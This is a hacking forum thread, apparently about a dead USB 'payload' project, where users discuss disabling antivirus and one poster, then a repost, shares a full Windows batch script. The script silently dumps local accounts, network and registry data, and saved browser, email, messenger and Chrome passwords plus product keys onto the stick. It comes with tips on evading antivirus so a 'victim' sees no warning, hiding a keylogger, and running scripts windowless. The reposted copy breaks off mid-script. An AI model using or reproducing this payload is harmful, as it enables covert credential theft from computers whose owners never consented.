818 replies to this topic

[Jen]

Everyone thinks we have to, but no one wants to do it

[trialqw]

Slurp2 doesn't work when tried on windows 7...
It copies the desktop but not the My Documents...
Or did I just miss something?

Edit: Oh it's (Project) dead....

Edited by trialqw, 04 September 2010 - 12:31 PM.

[Gn0m3]

It would be nice if you could post the source of all regarding this project so I and whoever is willing may continue with it.
It's a nice set so I wouldn't like it dying...


Sorry for my english I'm Argentinian...

Regards.

Gn0m3

[Infiltrator]

So far what AVs have you managed to disable? Just wondering cause some AVs have protection that prevents them from being disabled in the first place.

[Josh_Soka80]

So far what AVs have you managed to disable? Just wondering cause some AVs have protection that prevents them from being disabled in the first place.

dead project infiltrator, its good work, needs to be resurrected.

[0hWhatsH1sFace]

I did this on a computer and now I can't get it off. How would I do so? I can't even get the Anti-Virus to turn back on. Please help asap

[razorlala]

I did this on a computer and now I can't get it off. How would I do so? I can't even get the Anti-Virus to turn back on. Please help asap

u remind me of myself years back where i made a dos virus and open it, resulting in my bios being flashed with virus. lolol. did u try registry? considering its been 2 months, perhaps u alr got it fixed. well, watever.


really appreciate it if the source could be up lol.

[dnv]

They should revive this project man

- Why did it stop?

[0xPHK]

because the ducky has pwned the autorun function

[powerkickeR]

Hey guys, does this still work? If so, I have so questions. Thanks ;p.

[powerkickeR]

I can't find the edit button...sorry.

Every time I try to install or enable a module, it says "The system cannot find the file specified", T_T.

[Tox1k]

No, it is picked up by AV's a lot. However, I've been recently messing around with what I'll call "GhostPad" for now, and I'm making one that doesn't get picked up by most AVs, so it's undetectable, and is just to recover info from computers, no PWdump because it's detected by most AVs.

GhostPad. If you want it truely undetectable, IE your victim won't get any warnings no matter what, delete everything from nirsoft (chromepass, iehv, iepv, mailpv, mspass, produkey).

Yeah, but this stuff is mainly dead. What might interest the OP is this if you throw on a command line switch, then you can have your keylogger write and hide in a "ghosted" folder.

Also, use this in a .vbs file and open it with a batch file referencing your start, and it'll run without a window.

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Also, making something similar to USB 3.0 (so AVs can't delete files):
Download, make a CD partition, add your ISO. Make an ISO with MagicISO or some other software.

What I had planned was a Swiss Army Knife, includes ByteSpy, Cain, Cheat Engine, md5 Hash Changer, IP Changer, PortBlocker, Mac Address Changer, Trainer Maker, UDP-Unicorn, WireShark, Panther, smsniff, LanSchool Crasher, VirtualBox, and uTorrent and that with the payload was all under 150 mb.

batch file for payload:

Spoiler

@echo off

:: Thanks to GuidoZ for the template idea.
:: I don't know who originally made this forensics, but it has been upgraded over time by me.


:: Setting Log File Location

SET logdir="%1\logs\%computername%"

IF NOT EXIST %1\logs\%computername% (
MD %1\logs\%computername%
)

:: Adding an ignore for your own computer

IF EXIST "%systemroot%\safe.dat" goto End

IF NOT EXIST "%systemroot%\safe.dat" goto INFO

:INFO
ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt
ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt
ECHO + + >> %1\logs\%computername%\info.txt
ECHO + yyy_not's Payload / Swiss Army Knife + >> %1\logs\%computername%\info.txt
ECHO + + >> %1\logs\%computername%\info.txt
ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt
ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt
ECHO + http://tox1kmods.webs.com + >> %1\logs\%computername%\info.txt
ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt
ECHO [Time Started: %date% %time%] >> %1\logs\%computername%\info.txt
ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt
goto LOCALACCTS

:LOCALACCTS
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt
ECHO + [Local User Accounts] +>> %1\logs\%computername%\localaccts-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt
ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

echo Local User Accounts: >>%1\logs\%computername%\localaccts-%computername%.txt
net users >> %1\logs\%computername%\localaccts-%computername%.txt
echo Currently Logged on Users: >>%1\logs\%computername%\localaccts-%computername%.txt
psloggedon /accepteula >> %1\logs\%computername%\localaccts-%computername%.txt
echo Local Groups: >>%1\logs\%computername%\localaccts-%computername%.txt
net localgroup >> %1\logs\%computername%\localaccts-%computername%.txt
echo Members of the local administrators group: >>%1\logs\%computername%\localaccts-%computername%.txt
net localgroup administrators >> %1\logs\%computername%\localaccts-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt
ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt
echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localaccts-%computername%.txt
goto LOCALNET

:LOCALNET
ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt
ECHO + [Network Info, ARP Tables, Open Connections, Firewall Status] +>> %1\logs\%computername%\localnet-%computername%.txt
ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt
ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

echo Current IP Configuration: >> %1\logs\%computername%\localnet-%computername%.txt
ipconfig /all >> %1\logs\%computername%\localnet-%computername%.txt
echo Contents of the DNS Cache: >> %1\logs\%computername%\localnet-%computername%.txt
ipconfig /displaydns >> %1\logs\%computername%\localnet-%computername%.txt
echo ARP Table Contents: >> %1\logs\%computername%\localnet-%computername%.txt
arp -a >> %1\logs\%computername%\localnet-%computername%.txt
echo Status of active TCP and UDP connections: >> %1\logs\%computername%\localnet-%computername%.txt
netstat -ano >> %1\logs\%computername%\localnet-%computername%.txt
echo Routing Table: >> %1\logs\%computername%\localnet-%computername%.txt
route print >> %1\logs\%computername%\localnet-%computername%.txt
echo Hosts file contents: >> %1\logs\%computername%\localnet-%computername%.txt
type %systemroot%\system32\drivers\etc\hosts >> %1\logs\%computername%\localnet-%computername%.txt
echo Windows Firewall Configuration: >> %1\logs\%computername%\localnet-%computername%.txt
netsh firewall show state >> %1\logs\%computername%\localnet-%computername%.txt
echo Windows Firewall service state: >> %1\logs\%computername%\localnet-%computername%.txt
netsh firewall show service >> %1\logs\%computername%\localnet-%computername%.txt
echo Mapped Network Drives: >> %1\logs\%computername%\localnet-%computername%.txt
net use >> %1\logs\%computername%\localnet-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt
ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt
echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localnet-%computername%.txt
goto SYSINFO

:SYSINFO
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO + [Installed Software, Running Processes] + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Machine Information: >> %1\logs\%computername%\sysinfo-%computername%.txt
psinfo /accepteula /h /s >> %1\logs\%computername%\sysinfo-%computername%.txt
echo Running Processes: >> %1\logs\%computername%\sysinfo-%computername%.txt
pslist -t /accepteula >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO + [Services from Running Processes] + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Services running from each process: >> %1\logs\%computername%\sysinfo-%computername%.txt
tasklist /svc >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO + [State of Services on Machine] + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Service states: >> %1\logs\%computername%\sysinfo-%computername%.txt
sc query state= all >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO + [Installed Printers] + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Printer Information: >> %1\logs\%computername%\sysinfo-%computername%.txt
cscript %WINDIR%\System32\Prnmngr.vbs -l >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO + [Group Policies] + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Effective group policies: >> %1\logs\%computername%\sysinfo-%computername%.txt
gpresult -r -z >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO + [Drivers in use] + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Drivers currently in use: >> %1\logs\%computername%\sysinfo-%computername%.txt
driverquery >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO + [System Variables] + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo System Variables: >> %1\logs\%computername%\sysinfo-%computername%.txt
set >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO + [Startup Run RunOnce] + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

REM Export the Run and RunOnce Values inside HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER
reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKLMrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt
reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKLMrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt
reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKCUrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt
reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKCUrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\sysinfo-%computername%.txt
goto ERRORLOG

:ERRORLOG
ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt
ECHO + [System Error Log] +>> %1\logs\%computername%\syslog-%computername%.txt
ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt
ECHO. >> %1\logs\%computername%\syslog-%computername%.txt
ECHO This will only work in Windows Vista/XP >> %1\logs\%computername%\syslog-%computername%.txt
ECHO. >> %1\logs\%computername%\syslog-%computername%.txt
REM Grab Sytem Error Log for Review (Error ONLY)
cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L System >> %1\logs\%computername%\syslog-%computername%.txt
REM Grab Application Error Logs for Review
cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L Application >> %1\logs\%computername%\syslog-%computername%.txt
goto PORT

:PORT
ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt
ECHO + [Port Scan] + >> %1\logs\%computername%\netlog-info-%computername%.txt
ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt
ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt
START .\portqry -local -l %1\logs\%computername%\netlog-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt
ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt
goto MD5

:MD5
ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt
ECHO + [MD5 Hashes of the system directory] +>> %1\logs\%computername%\osmd5-%computername%.txt
ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt
ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

echo %date% %time% >> %1\logs\%computername%\osmd5-%computername%.txt
md5sums %systemroot% >> %1\logs\%computername%\osmd5-%computername%.txt
md5sums %systemroot%\system >> %1\logs\%computername%\osmd5-%computername%.txt
md5sums %systemroot%\system32 >> %1\logs\%computername%\osmd5-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt
ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt
echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\osmd5-%computername%.txt
goto MDINFO

:MDINFO
IF NOT EXIST %1\logs\%computername%\userinfo (
MD %1\logs\%computername%\userinfo\
)
goto MDPASS
:MDPASS
IF NOT EXIST %1\logs\%computername%\userinfo\pass (
MD %1\logs\%computername%\userinfo\pass\
)
goto IEFIREHIST

:IEFIREHIST


:INFO
ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO + [Information Recovery] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt
ECHO + [Dumping IE and FireFox history] +>> %1\logs\%computername%\userinfo\urllog-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt

START .\FirePassword.exe >> %1\logs\%computername%\userinfo\pass\firepass-%computername%.txt
START cscript .\IE_FireFox.vbs >> %1\logs\%computername%\userinfo\firehistorylog-%computername%.txt
START .\iehv.exe /stext %1\logs\%computername%\userinfo\IElog-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords stored in .\pass\firepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords stored in .\pass\firehistorylog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords stored in .\pass\IElog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO + [Dump Mail PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords stored in .\pass\mailpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
START .\mailpv.exe /stext "%1\logs\%computername%\userinfo\pass\mailpass-%computername%.txt" /sort "Application" /sort "Name"

ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO + [Dump IE PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords stored in .\pass\IEpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
START .\iepv.exe /stext "%1\logs\%computername%\userinfo\pass\IEpass-%computername%.txt" /sort "Entry Name"

ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO + [Dump Messanger PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords will be dumped in .\pass\MSpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
START .\mspass.exe /stext %1\logs\%computername%\userinfo\pass\MSpass-%computername%.txt

ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO + [Dump Product Keys] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
START .\PRODUKEY.exe /nosavereg /stext "%1\logs\%computername%\userinfo\productkeys-%computername%.txt" /remote %computername% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO + [Dumping Chrome Passwords] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO Passwords stored in .\pass\chromepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
START .\ChromePass.exe /stext %1\logs\%computername%\userinfo\pass\chromepass-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt
goto END

:END
ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt
ECHO [Time Completed: %date% %time%] >> %1\logs\%computername%\info.txt
ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt
START EXPLORER.EXE
exit

[iknuts]

Hi guys... i still have know idea how to install this... i realize its been 3years since anyone responeded to this topic, but i'm hoping someone can help me out.
my USB is NON U3, i've got the payload, but everytime i run the menu.bat and try and enable modules, the command result is 'File not found'... what am i doing wrong?


thanks

[iknuts]

No, it is picked up by AV's a lot. However, I've been recently messing around with what I'll call "GhostPad" for now, and I'm making one that doesn't get picked up by most AVs, so it's undetectable, and is just to recover info from computers, no PWdump because it's detected by most AVs.

GhostPad. If you want it truely undetectable, IE your victim won't get any warnings no matter what, delete everything from nirsoft (chromepass, iehv, iepv, mailpv, mspass, produkey).

Yeah, but this stuff is mainly dead. What might interest the OP is this if you throw on a command line switch, then you can have your keylogger write and hide in a "ghosted" folder.

Also, use this in a .vbs file and open it with a batch file referencing your start, and it'll run without a window.

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Also, making something similar to USB 3.0 (so AVs can't delete files):
Download, make a CD partition, add your ISO. Make an ISO with MagicISO or some other software.

What I had planned was a Swiss Army Knife, includes ByteSpy, Cain, Cheat Engine, md5 Hash Changer, IP Changer, PortBlocker, Mac Address Changer, Trainer Maker, UDP-Unicorn, WireShark, Panther, smsniff, LanSchool Crasher, VirtualBox, and uTorrent and that with the payload was all under 150 mb.

batch file for payload:

Spoiler

@echo off

:: Thanks to GuidoZ for the template idea.
:: I don't know who originally made this forensics, but it has been upgraded over time by me.


:: Setting Log File Location

SET logdir="%1\logs\%computername%"

IF NOT EXIST %1\logs\%computername% (
MD %1\logs\%computername%
)

:: Adding an ignore for your own computer

IF EXIST "%systemroot%\safe.dat" goto End

IF NOT EXIST "%systemroot%\safe.dat" goto INFO

:INFO
ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt
ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt
ECHO +                                         + >> %1\logs\%computername%\info.txt
ECHO +  yyy_not's Payload / Swiss Army Knife   + >> %1\logs\%computername%\info.txt
ECHO +                                         + >> %1\logs\%computername%\info.txt
ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt
ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt
ECHO +       http://tox1kmods.web...ebs.com         + >> %1\logs\%computername%\info.txt
ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt
ECHO [Time Started: %date% %time%] >> %1\logs\%computername%\info.txt
ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt
goto LOCALACCTS

:LOCALACCTS
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt
ECHO +                [Local User Accounts]               +>> %1\logs\%computername%\localaccts-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt
ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

echo Local User Accounts: >>%1\logs\%computername%\localaccts-%computername%.txt
net users >> %1\logs\%computername%\localaccts-%computername%.txt
echo Currently Logged on Users: >>%1\logs\%computername%\localaccts-%computername%.txt
psloggedon /accepteula >> %1\logs\%computername%\localaccts-%computername%.txt
echo Local Groups: >>%1\logs\%computername%\localaccts-%computername%.txt
net localgroup >> %1\logs\%computername%\localaccts-%computername%.txt
echo Members of the local administrators group: >>%1\logs\%computername%\localaccts-%computername%.txt
net localgroup administrators >> %1\logs\%computername%\localaccts-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt
ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt
echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localaccts-%computername%.txt
goto LOCALNET

:LOCALNET
ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt
ECHO +  [Network Info, ARP Tables, Open Connections, Firewall Status]  +>> %1\logs\%computername%\localnet-%computername%.txt
ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt
ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

echo Current IP Configuration: >> %1\logs\%computername%\localnet-%computername%.txt
ipconfig /all >> %1\logs\%computername%\localnet-%computername%.txt
echo Contents of the DNS Cache: >> %1\logs\%computername%\localnet-%computername%.txt
ipconfig /displaydns >> %1\logs\%computername%\localnet-%computername%.txt
echo ARP Table Contents: >> %1\logs\%computername%\localnet-%computername%.txt
arp -a >> %1\logs\%computername%\localnet-%computername%.txt
echo Status of active TCP and UDP connections: >> %1\logs\%computername%\localnet-%computername%.txt
netstat -ano >> %1\logs\%computername%\localnet-%computername%.txt
echo Routing Table: >> %1\logs\%computername%\localnet-%computername%.txt
route print >> %1\logs\%computername%\localnet-%computername%.txt
echo Hosts file contents: >> %1\logs\%computername%\localnet-%computername%.txt
type %systemroot%\system32\drivers\etc\hosts >> %1\logs\%computername%\localnet-%computername%.txt
echo Windows Firewall Configuration: >> %1\logs\%computername%\localnet-%computername%.txt
netsh firewall show state >> %1\logs\%computername%\localnet-%computername%.txt
echo Windows Firewall service state: >> %1\logs\%computername%\localnet-%computername%.txt
netsh firewall show service >> %1\logs\%computername%\localnet-%computername%.txt
echo Mapped Network Drives: >> %1\logs\%computername%\localnet-%computername%.txt
net use >> %1\logs\%computername%\localnet-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt
ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt
echo FILE SIGNATURE  %random%%random%%random% >> %1\logs\%computername%\localnet-%computername%.txt
goto SYSINFO

:SYSINFO
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +      [Installed Software, Running Processes]       + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Machine Information:  >> %1\logs\%computername%\sysinfo-%computername%.txt
psinfo /accepteula /h /s >> %1\logs\%computername%\sysinfo-%computername%.txt
echo Running Processes:  >> %1\logs\%computername%\sysinfo-%computername%.txt
pslist -t /accepteula >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +         [Services from Running Processes]          + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Services running from each process: >> %1\logs\%computername%\sysinfo-%computername%.txt
tasklist /svc >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +          [State of Services on Machine]            + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Service states:  >> %1\logs\%computername%\sysinfo-%computername%.txt
sc query state= all >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +               [Installed Printers]                 + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Printer Information:  >> %1\logs\%computername%\sysinfo-%computername%.txt
cscript  %WINDIR%\System32\Prnmngr.vbs -l >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +                 [Group Policies]                   + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Effective group policies:  >> %1\logs\%computername%\sysinfo-%computername%.txt
gpresult -r -z >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +                 [Drivers in use]                   + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo Drivers currently in use:  >> %1\logs\%computername%\sysinfo-%computername%.txt
driverquery >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +                [System Variables]                  + >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

echo System Variables:  >> %1\logs\%computername%\sysinfo-%computername%.txt
set >> %1\logs\%computername%\sysinfo-%computername%.txt

ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt
ECHO +              [Startup Run RunOnce]                 + >> %1\logs\%computername%\sysinfo-%computername%.txt
